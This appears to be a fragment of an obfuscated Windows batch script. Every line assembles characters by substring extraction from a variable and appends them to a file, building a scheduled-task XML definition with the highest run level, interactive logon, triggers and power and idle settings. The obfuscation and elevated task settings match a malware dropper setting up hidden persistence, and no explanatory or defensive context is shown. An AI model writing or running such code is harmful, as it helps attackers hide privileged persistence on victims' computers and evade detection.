>>%uwcrnxl%  %ocvdubf:~52,1%%ocvdubf:~39,1%%ocvdubf:~47,1%%ocvdubf:~17,1%%ocvdubf:~46,1%%ocvdubf:~49,1%%ocvdubf:~42,1%%ocvdubf:~64,1%%ocvdubf:~34,1%%ocvdubf:~55,1%%ocvdubf:~46,1%%ocvdubf:~57,1%%ocvdubf:~42,1%%ocvdubf:~65,1%%ocvdubf:~1,1%%ocvdubf:~65,1%<%ocvdubf:~16,1%%ocvdubf:~51,1%%ocvdubf:~38,1%%ocvdubf:~39,1%%ocvdubf:~49,1%%ocvdubf:~42,1%%ocvdubf:~41,1%>%ocvdubf:~43,1%%ocvdubf:~38,1%%ocvdubf:~49,1%%ocvdubf:~56,1%%ocvdubf:~42,1%<%ocvdubf:~68,1%%ocvdubf:~16,1%%ocvdubf:~51,1%%ocvdubf:~38,1%%ocvdubf:~39,1%%ocvdubf:~49,1%%ocvdubf:~42,1%%ocvdubf:~41,1%>%ocvdubf:~1,1%%ocvdubf:~65,1%%ocvdubf:~67,1%%ocvdubf:~65,1%%ocvdubf:~59,1%%ocvdubf:~39,1%%ocvdubf:~14,1%%ocvdubf:~55,1%%ocvdubf:~23,1%%ocvdubf:~43,1%
>>%uwcrnxl%  %ocvdubf:~52,1%%ocvdubf:~39,1%%ocvdubf:~47,1%%ocvdubf:~17,1%%ocvdubf:~46,1%%ocvdubf:~49,1%%ocvdubf:~42,1%%ocvdubf:~64,1%%ocvdubf:~34,1%%ocvdubf:~55,1%%ocvdubf:~46,1%%ocvdubf:~57,1%%ocvdubf:~42,1%%ocvdubf:~65,1%%ocvdubf:~1,1%%ocvdubf:~65,1%<%ocvdubf:~68,1%%ocvdubf:~29,1%%ocvdubf:~42,1%%ocvdubf:~44,1%%ocvdubf:~46,1%%ocvdubf:~56,1%%ocvdubf:~57,1%%ocvdubf:~55,1%%ocvdubf:~38,1%%ocvdubf:~57,1%%ocvdubf:~46,1%%ocvdubf:~52,1%%ocvdubf:~51,1%%ocvdubf:~31,1%%ocvdubf:~55,1%%ocvdubf:~46,1%%ocvdubf:~44,1%%ocvdubf:~44,1%%ocvdubf:~42,1%%ocvdubf:~55,1%>%ocvdubf:~1,1%%ocvdubf:~65,1%%ocvdubf:~67,1%%ocvdubf:~65,1%%ocvdubf:~59,1%%ocvdubf:~39,1%%ocvdubf:~14,1%%ocvdubf:~55,1%%ocvdubf:~23,1%%ocvdubf:~43,1%
>>%uwcrnxl%  %ocvdubf:~52,1%%ocvdubf:~39,1%%ocvdubf:~47,1%%ocvdubf:~17,1%%ocvdubf:~46,1%%ocvdubf:~49,1%%ocvdubf:~42,1%%ocvdubf:~64,1%%ocvdubf:~34,1%%ocvdubf:~55,1%%ocvdubf:~46,1%%ocvdubf:~57,1%%ocvdubf:~42,1%%ocvdubf:~65,1%%ocvdubf:~1,1%%ocvdubf:~65,1%<%ocvdubf:~68,1%%ocvdubf:~31,1%%ocvdubf:~55,1%%ocvdubf:~46,1%%ocvdubf:~44,1%%ocvdubf:~44,1%%ocvdubf:~42,1%%ocvdubf:~55,1%%ocvdubf:~56,1%>%ocvdubf:~1,1%%ocvdubf:~65,1%%ocvdubf:~67,1%%ocvdubf:~65,1%%ocvdubf:~59,1%%ocvdubf:~39,1%%ocvdubf:~14,1%%ocvdubf:~55,1%%ocvdubf:~23,1%%ocvdubf:~43,1%
>>%uwcrnxl%  %ocvdubf:~52,1%%ocvdubf:~39,1%%ocvdubf:~47,1%%ocvdubf:~17,1%%ocvdubf:~46,1%%ocvdubf:~49,1%%ocvdubf:~42,1%%ocvdubf:~64,1%%ocvdubf:~34,1%%ocvdubf:~55,1%%ocvdubf:~46,1%%ocvdubf:~57,1%%ocvdubf:~42,1%%ocvdubf:~65,1%%ocvdubf:~1,1%%ocvdubf:~65,1%%ocvdubf:~65,1%<%ocvdubf:~27,1%%ocvdubf:~55,1%%ocvdubf:~46,1%%ocvdubf:~51,1%%ocvdubf:~40,1%%ocvdubf:~46,1%%ocvdubf:~53,1%%ocvdubf:~38,1%%ocvdubf:~49,1%%ocvdubf:~56,1%>%ocvdubf:~1,1%%ocvdubf:~65,1%%ocvdubf:~67,1%%ocvdubf:~65,1%%ocvdubf:~59,1%%ocvdubf:~39,1%%ocvdubf:~14,1%%ocvdubf:~55,1%%ocvdubf:~23,1%%ocvdubf:~43,1%
>>%uwcrnxl%  %ocvdubf:~52,1%%ocvdubf:~39,1%%ocvdubf:~47,1%%ocvdubf:~17,1%%ocvdubf:~46,1%%ocvdubf:~49,1%%ocvdubf:~42,1%%ocvdubf:~64,1%%ocvdubf:~34,1%%ocvdubf:~55,1%%ocvdubf:~46,1%%ocvdubf:~57,1%%ocvdubf:~42,1%%ocvdubf:~65,1%%ocvdubf:~1,1%%ocvdubf:~65,1%<%ocvdubf:~27,1%%ocvdubf:~55,1%%ocvdubf:~46,1%%ocvdubf:~51,1%%ocvdubf:~40,1%%ocvdubf:~46,1%%ocvdubf:~53,1%%ocvdubf:~38,1%%ocvdubf:~49,1%%ocvdubf:~65,1%%ocvdubf:~46,1%%ocvdubf:~41,1%=%ocvdubf:~70,1%%ocvdubf:~12,1%%ocvdubf:~58,1%%ocvdubf:~57,1%%ocvdubf:~45,1%%ocvdubf:~52,1%%ocvdubf:~55,1%%ocvdubf:~70,1%>%ocvdubf:~1,1%%ocvdubf:~65,1%%ocvdubf:~67,1%%ocvdubf:~65,1%%ocvdubf:~59,1%%ocvdubf:~39,1%%ocvdubf:~14,1%%ocvdubf:~55,1%%ocvdubf:~23,1%%ocvdubf:~43,1%
>>%uwcrnxl%  %ocvdubf:~52,1%%ocvdubf:~39,1%%ocvdubf:~47,1%%ocvdubf:~17,1%%ocvdubf:~46,1%%ocvdubf:~49,1%%ocvdubf:~42,1%%ocvdubf:~64,1%%ocvdubf:~34,1%%ocvdubf:~55,1%%ocvdubf:~46,1%%ocvdubf:~57,1%%ocvdubf:~42,1%%ocvdubf:~65,1%%ocvdubf:~1,1%%ocvdubf:~65,1%<%ocvdubf:~32,1%%ocvdubf:~56,1%%ocvdubf:~42,1%%ocvdubf:~55,1%%ocvdubf:~20,1%%ocvdubf:~41,1%>%ocvdubf:~1,1%%ocvdubf:~67,1%%ocvdubf:~51,1%%ocvdubf:~52,1%%ocvdubf:~50,1%%ocvdubf:~42,1%%ocvdubf:~53,1%%ocvdubf:~40,1%%ocvdubf:~67,1%%ocvdubf:~1,1%\%ocvdubf:~1,1%%ocvdubf:~67,1%%ocvdubf:~51,1%%ocvdubf:~52,1%%ocvdubf:~50,1%%ocvdubf:~42,1%%ocvdubf:~67,1%%ocvdubf:~1,1%<%ocvdubf:~68,1%%ocvdubf:~32,1%%ocvdubf:~56,1%%ocvdubf:~42,1%%ocvdubf:~55,1%%ocvdubf:~20,1%%ocvdubf:~41,1%>%ocvdubf:~65,1%%ocvdubf:~1,1%%ocvdubf:~65,1%%ocvdubf:~67,1%%ocvdubf:~65,1%%ocvdubf:~59,1%%ocvdubf:~39,1%%ocvdubf:~14,1%%ocvdubf:~55,1%%ocvdubf:~23,1%%ocvdubf:~43,1%
>>%uwcrnxl%  %ocvdubf:~52,1%%ocvdubf:~39,1%%ocvdubf:~47,1%%ocvdubf:~17,1%%ocvdubf:~46,1%%ocvdubf:~49,1%%ocvdubf:~42,1%%ocvdubf:~64,1%%ocvdubf:~34,1%%ocvdubf:~55,1%%ocvdubf:~46,1%%ocvdubf:~57,1%%ocvdubf:~42,1%%ocvdubf:~65,1%%ocvdubf:~1,1%%ocvdubf:~65,1%<%ocvdubf:~23,1%%ocvdubf:~52,1%%ocvdubf:~44,1%%ocvdubf:~52,1%%ocvdubf:~51,1%%ocvdubf:~31,1%%ocvdubf:~62,1%%ocvdubf:~53,1%%ocvdubf:~42,1%>%ocvdubf:~20,1%%ocvdubf:~51,1%%ocvdubf:~57,1%%ocvdubf:~42,1%%ocvdubf:~55,1%%ocvdubf:~38,1%%ocvdubf:~40,1%%ocvdubf:~57,1%%ocvdubf:~46,1%%ocvdubf:~59,1%%ocvdubf:~42,1%%ocvdubf:~31,1%%ocvdubf:~52,1%%ocvdubf:~48,1%%ocvdubf:~42,1%%ocvdubf:~51,1%<%ocvdubf:~68,1%%ocvdubf:~23,1%%ocvdubf:~52,1%%ocvdubf:~44,1%%ocvdubf:~52,1%%ocvdubf:~51,1%%ocvdubf:~31,1%%ocvdubf:~62,1%%ocvdubf:~53,1%%ocvdubf:~42,1%>%ocvdubf:~1,1%%ocvdubf:~65,1%%ocvdubf:~67,1%%ocvdubf:~65,1%%ocvdubf:~59,1%%ocvdubf:~39,1%%ocvdubf:~14,1%%ocvdubf:~55,1%%ocvdubf:~23,1%%ocvdubf:~43,1%
>>%uwcrnxl%  %ocvdubf:~52,1%%ocvdubf:~39,1%%ocvdubf:~47,1%%ocvdubf:~17,1%%ocvdubf:~46,1%%ocvdubf:~49,1%%ocvdubf:~42,1%%ocvdubf:~64,1%%ocvdubf:~34,1%%ocvdubf:~55,1%%ocvdubf:~46,1%%ocvdubf:~57,1%%ocvdubf:~42,1%%ocvdubf:~65,1%%ocvdubf:~1,1%%ocvdubf:~65,1%<%ocvdubf:~29,1%%ocvdubf:~58,1%%ocvdubf:~51,1%%ocvdubf:~23,1%%ocvdubf:~42,1%%ocvdubf:~59,1%%ocvdubf:~42,1%%ocvdubf:~49,1%>%ocvdubf:~23,1%%ocvdubf:~42,1%%ocvdubf:~38,1%%ocvdubf:~56,1%%ocvdubf:~57,1%%ocvdubf:~27,1%%ocvdubf:~55,1%%ocvdubf:~46,1%%ocvdubf:~59,1%%ocvdubf:~46,1%%ocvdubf:~49,1%%ocvdubf:~42,1%%ocvdubf:~44,1%%ocvdubf:~42,1%<%ocvdubf:~68,1%%ocvdubf:~29,1%%ocvdubf:~58,1%%ocvdubf:~51,1%%ocvdubf:~23,1%%ocvdubf:~42,1%%ocvdubf:~59,1%%ocvdubf:~42,1%%ocvdubf:~49,1%>%ocvdubf:~1,1%%ocvdubf:~65,1%%ocvdubf:~67,1%%ocvdubf:~65,1%%ocvdubf:~59,1%%ocvdubf:~39,1%%ocvdubf:~14,1%%ocvdubf:~55,1%%ocvdubf:~23,1%%ocvdubf:~43,1%
>>%uwcrnxl%  %ocvdubf:~52,1%%ocvdubf:~39,1%%ocvdubf:~47,1%%ocvdubf:~17,1%%ocvdubf:~46,1%%ocvdubf:~49,1%%ocvdubf:~42,1%%ocvdubf:~64,1%%ocvdubf:~34,1%%ocvdubf:~55,1%%ocvdubf:~46,1%%ocvdubf:~57,1%%ocvdubf:~42,1%%ocvdubf:~65,1%%ocvdubf:~1,1%%ocvdubf:~65,1%<%ocvdubf:~68,1%%ocvdubf:~27,1%%ocvdubf:~55,1%%ocvdubf:~46,1%%ocvdubf:~51,1%%ocvdubf:~40,1%%ocvdubf:~46,1%%ocvdubf:~53,1%%ocvdubf:~38,1%%ocvdubf:~49,1%>%ocvdubf:~1,1%%ocvdubf:~65,1%%ocvdubf:~67,1%%ocvdubf:~65,1%%ocvdubf:~59,1%%ocvdubf:~39,1%%ocvdubf:~14,1%%ocvdubf:~55,1%%ocvdubf:~23,1%%ocvdubf:~43,1%
>>%uwcrnxl%  %ocvdubf:~52,1%%ocvdubf:~39,1%%ocvdubf:~47,1%%ocvdubf:~17,1%%ocvdubf:~46,1%%ocvdubf:~49,1%%ocvdubf:~42,1%%ocvdubf:~64,1%%ocvdubf:~34,1%%ocvdubf:~55,1%%ocvdubf:~46,1%%ocvdubf:~57,1%%ocvdubf:~42,1%%ocvdubf:~65,1%%ocvdubf:~1,1%%ocvdubf:~65,1%<%ocvdubf:~68,1%%ocvdubf:~27,1%%ocvdubf:~55,1%%ocvdubf:~46,1%%ocvdubf:~51,1%%ocvdubf:~40,1%%ocvdubf:~46,1%%ocvdubf:~53,1%%ocvdubf:~38,1%%ocvdubf:~49,1%%ocvdubf:~56,1%>%ocvdubf:~1,1%%ocvdubf:~65,1%%ocvdubf:~67,1%%ocvdubf:~65,1%%ocvdubf:~59,1%%ocvdubf:~39,1%%ocvdubf:~14,1%%ocvdubf:~55,1%%ocvdubf:~23,1%%ocvdubf:~43,1%
>>%uwcrnxl%  %ocvdubf:~52,1%%ocvdubf:~39,1%%ocvdubf:~47,1%%ocvdubf:~17,1%%ocvdubf:~46,1%%ocvdubf:~49,1%%ocvdubf:~42,1%%ocvdubf:~64,1%%ocvdubf:~34,1%%ocvdubf:~55,1%%ocvdubf:~46,1%%ocvdubf:~57,1%%ocvdubf:~42,1%%ocvdubf:~65,1%%ocvdubf:~1,1%<%ocvdubf:~30,1%%ocvdubf:~42,1%%ocvdubf:~57,1%%ocvdubf:~57,1%%ocvdubf:~46,1%%ocvdubf:~51,1%%ocvdubf:~44,1%%ocvdubf:~56,1%>%ocvdubf:~1,1%%ocvdubf:~65,1%%ocvdubf:~67,1%%ocvdubf:~65,1%%ocvdubf:~59,1%%ocvdubf:~39,1%%ocvdubf:~14,1%%ocvdubf:~55,1%%ocvdubf:~23,1%%ocvdubf:~43,1%
>>%uwcrnxl%  %ocvdubf:~52,1%%ocvdubf:~39,1%%ocvdubf:~47,1%%ocvdubf:~17,1%%ocvdubf:~46,1%%ocvdubf:~49,1%%ocvdubf:~42,1%%ocvdubf:~64,1%%ocvdubf:~34,1%%ocvdubf:~55,1%%ocvdubf:~46,1%%ocvdubf:~57,1%%ocvdubf:~42,1%%ocvdubf:~65,1%%ocvdubf:~1,1%<%ocvdubf:~24,1%%ocvdubf:~58,1%%ocvdubf:~49,1%%ocvdubf:~57,1%%ocvdubf:~46,1%%ocvdubf:~53,1%%ocvdubf:~49,1%%ocvdubf:~42,1%%ocvdubf:~20,1%%ocvdubf:~51,1%%ocvdubf:~56,1%%ocvdubf:~57,1%%ocvdubf:~38,1%%ocvdubf:~51,1%%ocvdubf:~40,1%%ocvdubf:~42,1%%ocvdubf:~56,1%%ocvdubf:~27,1%%ocvdubf:~52,1%%ocvdubf:~49,1%%ocvdubf:~46,1%%ocvdubf:~40,1%%ocvdubf:~62,1%>%ocvdubf:~20,1%%ocvdubf:~44,1%%ocvdubf:~51,1%%ocvdubf:~52,1%%ocvdubf:~55,1%%ocvdubf:~42,1%%ocvdubf:~25,1%%ocvdubf:~42,1%%ocvdubf:~60,1%<%ocvdubf:~68,1%%ocvdubf:~24,1%%ocvdubf:~58,1%%ocvdubf:~49,1%%ocvdubf:~57,1%%ocvdubf:~46,1%%ocvdubf:~53,1%%ocvdubf:~49,1%%ocvdubf:~42,1%%ocvdubf:~20,1%%ocvdubf:~51,1%%ocvdubf:~56,1%%ocvdubf:~57,1%%ocvdubf:~38,1%%ocvdubf:~51,1%%ocvdubf:~40,1%%ocvdubf:~42,1%%ocvdubf:~56,1%%ocvdubf:~27,1%%ocvdubf:~52,1%%ocvdubf:~49,1%%ocvdubf:~46,1%%ocvdubf:~40,1%%ocvdubf:~62,1%>%ocvdubf:~65,1%%ocvdubf:~1,1%%ocvdubf:~65,1%%ocvdubf:~67,1%%ocvdubf:~65,1%%ocvdubf:~59,1%%ocvdubf:~39,1%%ocvdubf:~14,1%%ocvdubf:~55,1%%ocvdubf:~23,1%%ocvdubf:~43,1%
>>%uwcrnxl%  %ocvdubf:~52,1%%ocvdubf:~39,1%%ocvdubf:~47,1%%ocvdubf:~17,1%%ocvdubf:~46,1%%ocvdubf:~49,1%%ocvdubf:~42,1%%ocvdubf:~64,1%%ocvdubf:~34,1%%ocvdubf:~55,1%%ocvdubf:~46,1%%ocvdubf:~57,1%%ocvdubf:~42,1%%ocvdubf:~65,1%%ocvdubf:~1,1%%ocvdubf:~65,1%<%ocvdubf:~15,1%%ocvdubf:~46,1%%ocvdubf:~56,1%%ocvdubf:~38,1%%ocvdubf:~49,1%%ocvdubf:~49,1%%ocvdubf:~52,1%%ocvdubf:~60,1%%ocvdubf:~30,1%%ocvdubf:~57,1%%ocvdubf:~38,1%%ocvdubf:~55,1%%ocvdubf:~57,1%%ocvdubf:~20,1%%ocvdubf:~43,1%%ocvdubf:~26,1%%ocvdubf:~51,1%%ocvdubf:~13,1%%ocvdubf:~38,1%%ocvdubf:~57,1%%ocvdubf:~57,1%%ocvdubf:~42,1%%ocvdubf:~55,1%%ocvdubf:~46,1%%ocvdubf:~42,1%%ocvdubf:~56,1%>%ocvdubf:~43,1%%ocvdubf:~38,1%%ocvdubf:~49,1%%ocvdubf:~56,1%%ocvdubf:~42,1%<%ocvdubf:~68,1%%ocvdubf:~15,1%%ocvdubf:~46,1%%ocvdubf:~56,1%%ocvdubf:~38,1%%ocvdubf:~49,1%%ocvdubf:~49,1%%ocvdubf:~52,1%%ocvdubf:~60,1%%ocvdubf:~30,1%%ocvdubf:~57,1%%ocvdubf:~38,1%%ocvdubf:~55,1%%ocvdubf:~57,1%%ocvdubf:~20,1%%ocvdubf:~43,1%%ocvdubf:~26,1%%ocvdubf:~51,1%%ocvdubf:~13,1%%ocvdubf:~38,1%%ocvdubf:~57,1%%ocvdubf:~57,1%%ocvdubf:~42,1%%ocvdubf:~55,1%%ocvdubf:~46,1%%ocvdubf:~42,1%%ocvdubf:~56,1%>%ocvdubf:~1,1%%ocvdubf:~65,1%%ocvdubf:~67,1%%ocvdubf:~65,1%%ocvdubf:~59,1%%ocvdubf:~39,1%%ocvdubf:~14,1%%ocvdubf:~55,1%%ocvdubf:~23,1%%ocvdubf:~43,1%
>>%uwcrnxl%  %ocvdubf:~52,1%%ocvdubf:~39,1%%ocvdubf:~47,1%%ocvdubf:~17,1%%ocvdubf:~46,1%%ocvdubf:~49,1%%ocvdubf:~42,1%%ocvdubf:~64,1%%ocvdubf:~34,1%%ocvdubf:~55,1%%ocvdubf:~46,1%%ocvdubf:~57,1%%ocvdubf:~42,1%%ocvdubf:~65,1%%ocvdubf:~1,1%%ocvdubf:~65,1%<%ocvdubf:~30,1%%ocvdubf:~57,1%%ocvdubf:~52,1%%ocvdubf:~53,1%%ocvdubf:~20,1%%ocvdubf:~43,1%%ocvdubf:~18,1%%ocvdubf:~52,1%%ocvdubf:~46,1%%ocvdubf:~51,1%%ocvdubf:~44,1%%ocvdubf:~26,1%%ocvdubf:~51,1%%ocvdubf:~13,1%%ocvdubf:~38,1%%ocvdubf:~57,1%%ocvdubf:~57,1%%ocvdubf:~42,1%%ocvdubf:~55,1%%ocvdubf:~46,1%%ocvdubf:~42,1%%ocvdubf:~56,1%>%ocvdubf:~57,1%%ocvdubf:~55,1%%ocvdubf:~58,1%%ocvdubf:~42,1%<%ocvdubf:~68,1%%ocvdubf:~30,1%%ocvdubf:~57,1%%ocvdubf:~52,1%%ocvdubf:~53,1%%ocvdubf:~20,1%%ocvdubf:~43,1%%ocvdubf:~18,1%%ocvdubf:~52,1%%ocvdubf:~46,1%%ocvdubf:~51,1%%ocvdubf:~44,1%%ocvdubf:~26,1%%ocvdubf:~51,1%%ocvdubf:~13,1%%ocvdubf:~38,1%%ocvdubf:~57,1%%ocvdubf:~57,1%%ocvdubf:~42,1%%ocvdubf:~55,1%%ocvdubf:~46,1%%ocvdubf:~42,1%%ocvdubf:~56,1%>%ocvdubf:~1,1%%ocvdubf:~65,1%%ocvdubf:~67,1%%ocvdubf:~65,1%%ocvdubf:~59,1%%ocvdubf:~39,1%%ocvdubf:~14,1%%ocvdubf:~55,1%%ocvdubf:~23,1%%ocvdubf:~43,1%
>>%uwcrnxl%  %ocvdubf:~52,1%%ocvdubf:~39,1%%ocvdubf:~47,1%%ocvdubf:~17,1%%ocvdubf:~46,1%%ocvdubf:~49,1%%ocvdubf:~42,1%%ocvdubf:~64,1%%ocvdubf:~34,1%%ocvdubf:~55,1%%ocvdubf:~46,1%%ocvdubf:~57,1%%ocvdubf:~42,1%%ocvdubf:~65,1%%ocvdubf:~1,1%%ocvdubf:~65,1%<%ocvdubf:~12,1%%ocvdubf:~49,1%%ocvdubf:~49,1%%ocvdubf:~52,1%%ocvdubf:~60,1%%ocvdubf:~19,1%%ocvdubf:~38,1%%ocvdubf:~55,1%%ocvdubf:~41,1%%ocvdubf:~31,1%%ocvdubf:~42,1%%ocvdubf:~55,1%%ocvdubf:~50,1%%ocvdubf:~46,1%%ocvdubf:~51,1%%ocvdubf:~38,1%%ocvdubf:~57,1%%ocvdubf:~42,1%>%ocvdubf:~43,1%%ocvdubf:~38,1%%ocvdubf:~49,1%%ocvdubf:~56,1%%ocvdubf:~42,1%<%ocvdubf:~68,1%%ocvdubf:~12,1%%ocvdubf:~49,1%%ocvdubf:~49,1%%ocvdubf:~52,1%%ocvdubf:~60,1%%ocvdubf:~19,1%%ocvdubf:~38,1%%ocvdubf:~55,1%%ocvdubf:~41,1%%ocvdubf:~31,1%%ocvdubf:~42,1%%ocvdubf:~55,1%%ocvdubf:~50,1%%ocvdubf:~46,1%%ocvdubf:~51,1%%ocvdubf:~38,1%%ocvdubf:~57,1%%ocvdubf:~42,1%>%ocvdubf:~65,1%%ocvdubf:~1,1%%ocvdubf:~65,1%%ocvdubf:~67,1%%ocvdubf:~65,1%%ocvdubf:~59,1%%ocvdubf:~39,1%%ocvdubf:~14,1%%ocvdubf:~55,1%%ocvdubf:~23,1%%ocvdubf:~43,1%
>>%uwcrnxl%  %ocvdubf:~52,1%%ocvdubf:~39,1%%ocvdubf:~47,1%%ocvdubf:~17,1%%ocvdubf:~46,1%%ocvdubf:~49,1%%ocvdubf:~42,1%%ocvdubf:~64,1%%ocvdubf:~34,1%%ocvdubf:~55,1%%ocvdubf:~46,1%%ocvdubf:~57,1%%ocvdubf:~42,1%%ocvdubf:~65,1%%ocvdubf:~1,1%%ocvdubf:~65,1%<%ocvdubf:~30,1%%ocvdubf:~57,1%%ocvdubf:~38,1%%ocvdubf:~55,1%%ocvdubf:~57,1%%ocvdubf:~34,1%%ocvdubf:~45,1%%ocvdubf:~42,1%%ocvdubf:~51,1%%ocvdubf:~12,1%%ocvdubf:~59,1%%ocvdubf:~38,1%%ocvdubf:~46,1%%ocvdubf:~49,1%%ocvdubf:~38,1%%ocvdubf:~39,1%%ocvdubf:~49,1%%ocvdubf:~42,1%>%ocvdubf:~57,1%%ocvdubf:~55,1%%ocvdubf:~58,1%%ocvdubf:~42,1%<%ocvdubf:~68,1%%ocvdubf:~30,1%%ocvdubf:~57,1%%ocvdubf:~38,1%%ocvdubf:~55,1%%ocvdubf:~57,1%%ocvdubf:~34,1%%ocvdubf:~45,1%%ocvdubf:~42,1%%ocvdubf:~51,1%%ocvdubf:~12,1%%ocvdubf:~59,1%%ocvdubf:~38,1%%ocvdubf:~46,1%%ocvdubf:~49,1%%ocvdubf:~38,1%%ocvdubf:~39,1%%ocvdubf:~49,1%%ocvdubf:~42,1%>%ocvdubf:~1,1%%ocvdubf:~65,1%%ocvdubf:~67,1%%ocvdubf:~65,1%%ocvdubf:~59,1%%ocvdubf:~39,1%%ocvdubf:~14,1%%ocvdubf:~55,1%%ocvdubf:~23,1%%ocvdubf:~43,1%
>>%uwcrnxl%  %ocvdubf:~52,1%%ocvdubf:~39,1%%ocvdubf:~47,1%%ocvdubf:~17,1%%ocvdubf:~46,1%%ocvdubf:~49,1%%ocvdubf:~42,1%%ocvdubf:~64,1%%ocvdubf:~34,1%%ocvdubf:~55,1%%ocvdubf:~46,1%%ocvdubf:~57,1%%ocvdubf:~42,1%%ocvdubf:~65,1%%ocvdubf:~1,1%%ocvdubf:~65,1%%ocvdubf:~65,1%<%ocvdubf:~29,1%%ocvdubf:~58,1%%ocvdubf:~51,1%%ocvdubf:~26,1%%ocvdubf:~51,1%%ocvdubf:~49,1%%ocvdubf:~62,1%%ocvdubf:~20,1%%ocvdubf:~43,1%%ocvdubf:~25,1%%ocvdubf:~42,1%%ocvdubf:~57,1%%ocvdubf:~60,1%%ocvdubf:~52,1%%ocvdubf:~55,1%%ocvdubf:~48,1%%ocvdubf:~12,1%%ocvdubf:~59,1%%ocvdubf:~38,1%%ocvdubf:~46,1%%ocvdubf:~49,1%%ocvdubf:~38,1%%ocvdubf:~39,1%%ocvdubf:~49,1%%ocvdubf:~42,1%>%ocvdubf:~43,1%%ocvdubf:~38,1%%ocvdubf:~49,1%%ocvdubf:~56,1%%ocvdubf:~42,1%<%ocvdubf:~68,1%%ocvdubf:~29,1%%ocvdubf:~58,1%%ocvdubf:~51,1%%ocvdubf:~26,1%%ocvdubf:~51,1%%ocvdubf:~49,1%%ocvdubf:~62,1%%ocvdubf:~20,1%%ocvdubf:~43,1%%ocvdubf:~25,1%%ocvdubf:~42,1%%ocvdubf:~57,1%%ocvdubf:~60,1%%ocvdubf:~52,1%%ocvdubf:~55,1%%ocvdubf:~48,1%%ocvdubf:~12,1%%ocvdubf:~59,1%%ocvdubf:~38,1%%ocvdubf:~46,1%%ocvdubf:~49,1%%ocvdubf:~38,1%%ocvdubf:~39,1%%ocvdubf:~49,1%%ocvdubf:~42,1%>%ocvdubf:~1,1%%ocvdubf:~65,1%%ocvdubf:~67,1%%ocvdubf:~65,1%%ocvdubf:~59,1%%ocvdubf:~39,1%%ocvdubf:~14,1%%ocvdubf:~55,1%%ocvdubf:~23,1%%ocvdubf:~43,1%
>>%uwcrnxl%  %ocvdubf:~52,1%%ocvdubf:~39,1%%ocvdubf:~47,1%%ocvdubf:~17,1%%ocvdubf:~46,1%%ocvdubf:~49,1%%ocvdubf:~42,1%%ocvdubf:~64,1%%ocvdubf:~34,1%%ocvdubf:~55,1%%ocvdubf:~46,1%%ocvdubf:~57,1%%ocvdubf:~42,1%%ocvdubf:~65,1%%ocvdubf:~1,1%%ocvdubf:~65,1%<%ocvdubf:~20,1%%ocvdubf:~41,1%%ocvdubf:~49,1%%ocvdubf:~42,1%%ocvdubf:~30,1%%ocvdubf:~42,1%%ocvdubf:~57,1%%ocvdubf:~57,1%%ocvdubf:~46,1%%ocvdubf:~51,1%%ocvdubf:~44,1%%ocvdubf:~56,1%>%ocvdubf:~1,1%%ocvdubf:~65,1%%ocvdubf:~67,1%%ocvdubf:~65,1%%ocvdubf:~59,1%%ocvdubf:~39,1%%ocvdubf:~14,1%%ocvdubf:~55,1%%ocvdubf:~23,1%%ocvdubf:~43,1%
>>%uwcrnxl%  %ocvdubf:~52,1%%ocvdubf:~39,1%%ocvdubf:~47,1%%ocvdubf:~17,1%%ocvdubf:~46,1%%ocvdubf:~49,1%%ocvdubf:~42,1%%ocvdubf:~64,1%%ocvdubf:~34,1%%ocvdubf:~55,1%%ocvdubf:~46,1%%ocvdubf:~57,1%%ocvdubf:~42,1%%ocvdubf:~65,1%%ocvdubf:~1,1%%ocvdubf:~65,1%<%ocvdubf:~30,1%%ocvdubf:~57,1%%ocvdubf:~52,1%%ocvdubf:~53,1%%ocvdubf:~26,1%%ocvdubf:~51,1%%ocvdubf:~20,1%%ocvdubf:~41,1%%ocvdubf:~49,1%%ocvdubf:~42,1%%ocvdubf:~16,1%%ocvdubf:~51,1%%ocvdubf:~41,1%>%ocvdubf:~57,1%%ocvdubf:~55,1%%ocvdubf:~58,1%%ocvdubf:~42,1%<%ocvdubf:~68,1%%ocvdubf:~30,1%%ocvdubf:~57,1%%ocvdubf:~52,1%%ocvdubf:~53,1%%ocvdubf:~26,1%%ocvdubf:~51,1%%ocvdubf:~20,1%%ocvdubf:~41,1%%ocvdubf:~49,1%%ocvdubf:~42,1%%ocvdubf:~16,1%%ocvdubf:~51,1%%ocvdubf:~41,1%>%ocvdubf:~1,1%%ocvdubf:~65,1%%ocvdubf:~67,1%%ocvdubf:~65,1%%ocvdubf:~59,1%%ocvdubf:~39,1%%ocvdubf:~14,1%%ocvdubf:~55,1%%ocvdubf:~23,1%%ocvdubf:~43,1%
>>%uwcrnxl%  %ocvdubf:~52,1%%ocvdubf:~39,1%%ocvdubf:~47,1%%ocvdubf:~17,1%%ocvdubf:~46,1%%ocvdubf:~49,1%%ocvdubf:~42,1%%ocvdubf:~64,1%%ocvdubf:~34,1%%ocvdubf:~55,1%%ocvdubf:~46,1%%ocvdubf:~57,1%%ocvdubf:~42,1%%ocvdubf:~65,1%%ocvdubf:~1,1%%ocvdubf:~65,1%<%ocvdubf:~29,1%%ocvdubf:~42,1%%ocvdubf:~56,1%%ocvdubf:~57,1%%ocvdubf:~38,1%%ocvdubf:~55,1%%ocvdubf:~57,1%%ocvdubf:~26,1%%ocvdubf:~51,1%%ocvdubf:~20,1%%ocvdubf:~41,1%%ocvdubf:~49,1%%ocvdubf:~42,1%>%ocvdubf:~43,1%%ocvdubf:~38,1%%ocvdubf:~49,1%%ocvdubf:~56,1%%ocvdubf:~42,1%<%ocvdubf:~68,1%%ocvdubf:~29,1%%ocvdubf:~42,1%%ocvdubf:~56,1%%ocvdubf:~57,1%%ocvdubf:~38,1%%ocvdubf:~55,1%%ocvdubf:~57,1%%ocvdubf:~26,1%%ocvdubf:~51,1%%ocvdubf:~20,1%%ocvdubf:~41,1%%ocvdubf:~49,1%%ocvdubf:~42,1%>%ocvdubf:~1,1%%ocvdubf:~65,1%%ocvdubf:~67,1%%ocvdubf:~65,1%%ocvdubf:~59,1%%ocvdubf:~39,1%%ocvdubf:~14,1%%ocvdubf:~55,1%%ocvdubf:~23,1%%ocvdubf:~43,1%
